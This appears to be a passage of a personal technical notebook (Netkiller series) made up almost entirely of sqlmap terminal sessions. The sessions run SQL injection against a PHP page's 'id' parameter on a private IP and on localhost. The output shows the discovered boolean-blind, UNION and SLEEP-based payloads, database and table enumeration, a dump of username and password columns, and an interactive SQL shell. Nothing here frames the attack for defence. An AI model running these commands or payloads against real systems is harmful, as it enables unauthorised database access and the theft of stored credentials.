$ sqlmap -u "http://172.16.0.44/test/testdb.php?id=12" --dbs
[*] starting at: 15:59:20 [15:59:20] [INFO] testing connection to the target url [15:59:20] [INFO] testing if the url is stable, wait a few seconds [15:59:22] [INFO] url is stable [15:59:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [15:59:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [15:59:22] [INFO] testing if GET parameter 'id' is dynamic [15:59:22] [INFO] confirming that GET parameter 'id' is dynamic [15:59:22] [INFO] GET parameter 'id' is dynamic [15:59:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis [15:59:22] [INFO] testing unescaped numeric injection on GET parameter 'id' [15:59:22] [INFO] confirming unescaped numeric injection on GET parameter 'id' [15:59:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis [15:59:22] [INFO] testing for parenthesis on injectable parameter [15:59:22] [INFO] the injectable parameter requires 0 parenthesis [15:59:22] [INFO] testing MySQL [15:59:22] [INFO] confirming MySQL [15:59:22] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1 [15:59:22] [INFO] retrieved: 2 [15:59:22] [INFO] performed 13 queries in 0 seconds [15:59:22] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.0 [15:59:22] [INFO] fetching database names [15:59:22] [INFO] fetching number of databases [15:59:22] [INFO] query: SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR(10000)), CHAR(32)) FROM information_schema.SCHEMATA [15:59:22] [INFO] retrieved: 3 [15:59:23] [INFO] performed 13 queries in 0 seconds [15:59:23] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1 [15:59:23] [INFO] retrieved: information_schema [15:59:27] [INFO] performed 132 queries in 4 seconds [15:59:27] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1, 1 [15:59:27] [INFO] retrieved: groupgoods [15:59:29] [INFO] performed 76 queries in 2 seconds [15:59:29] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 2, 1 [15:59:29] [INFO] retrieved: test [15:59:30] [INFO] performed 34 queries in 1 seconds available databases [3]: [*] groupgoods [*] information_schema [*] test [15:59:30] [INFO] Fetched data logged to text files under '/home/neo/.sqlmap/output/172.16.0.44' [*] shutting down at: 15:59:30
$ sqlmap -u "http://localhost/test.php?id=98" --count
sqlmap/1.0-dev (r4843) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:36:50
[14:36:51] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[14:36:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:36:51] [INFO] testing connection to the target url
[14:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=98 AND 4108=4108
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=98 UNION ALL SELECT CONCAT(0x3a6b79703a,0x57596b57416f63567046,0x3a6c757a3a), NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=98 AND SLEEP(5)
---
[14:36:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[14:36:51] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[14:36:51] [INFO] fetching database names
[14:36:51] [INFO] fetching tables for databases: information_schema, mysql, neo, performance_schema, test
[14:36:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:36:52] [INFO] retrieved:
[14:36:52] [INFO] retrieved:
[14:36:52] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
Database: neo
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| test | 43 |
| stuff | 4 |
| users | 3 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 667 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 276 |
| SESSION_VARIABLES | 276 |
| USER_PRIVILEGES | 138 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| PARTITIONS | 90 |
| TABLES | 80 |
| STATISTICS | 78 |
| KEY_COLUMN_USAGE | 64 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 36 |
| TABLE_CONSTRAINTS | 35 |
| PLUGINS | 10 |
| ENGINES | 8 |
| SCHEMATA | 5 |
| PROCESSLIST | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1028 |
| help_topic | 508 |
| help_keyword | 465 |
| help_category | 38 |
| user | 8 |
| db | 3 |
| proxies_priv | 2 |
+---------------------------------------+---------+
[14:36:57] [INFO] Fetched data logged to text files under '/home/neo/sqlmap-dev/output/localhost'
[*] shutting down at 14:36:57
$ sqlmap -u "http://localhost/test.php?id=98" --sql-query="SELECT username, password FROM test"
sqlmap/1.0-dev (r4843) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:46:57
[15:46:58] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[15:46:58] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[15:46:58] [INFO] testing connection to the target url
[15:46:58] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=98 AND 4108=4108
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=98 UNION ALL SELECT CONCAT(0x3a6b79703a,0x57596b57416f63567046,0x3a6c757a3a), NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=98 AND SLEEP(5)
---
[15:46:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[15:46:58] [INFO] fetching SQL SELECT statement query output: 'SELECT username, password FROM test'
SELECT username, password FROM test [6]:
[*] neo, chen
[*] jam, zheng
[*] john, meng
[*] neo1, chen
[*] jam2, zheng
[*] john3, meng
[15:46:58] [INFO] Fetched data logged to text files under '/home/neo/sqlmap-dev/output/localhost'
[*] shutting down at 15:46:58
$ sqlmap -u "http://localhost/test.php?id=98" -v 1 --sql-shell
sqlmap/1.0-dev (r4812) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:54:39
[09:54:40] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[09:54:40] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[09:54:40] [INFO] testing connection to the target url
[09:54:40] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=98 AND 8779=8779
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=98 UNION ALL SELECT NULL, CONCAT(0x3a72776a3a,0x546a7a6578746f575762,0x3a62746d3a), NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=98 AND SLEEP(5)
---
[09:54:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[09:54:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select * from test;
[*] chen, 98, neo
[*] chen, 111, neo
[*] zheng, 112, jam
sql-shell>
原文出处:Netkiller 系列 手札
本文作者:陈景峯
转载请与作者联系,同时请务必标明文章原始出处和作者信息及本声明。
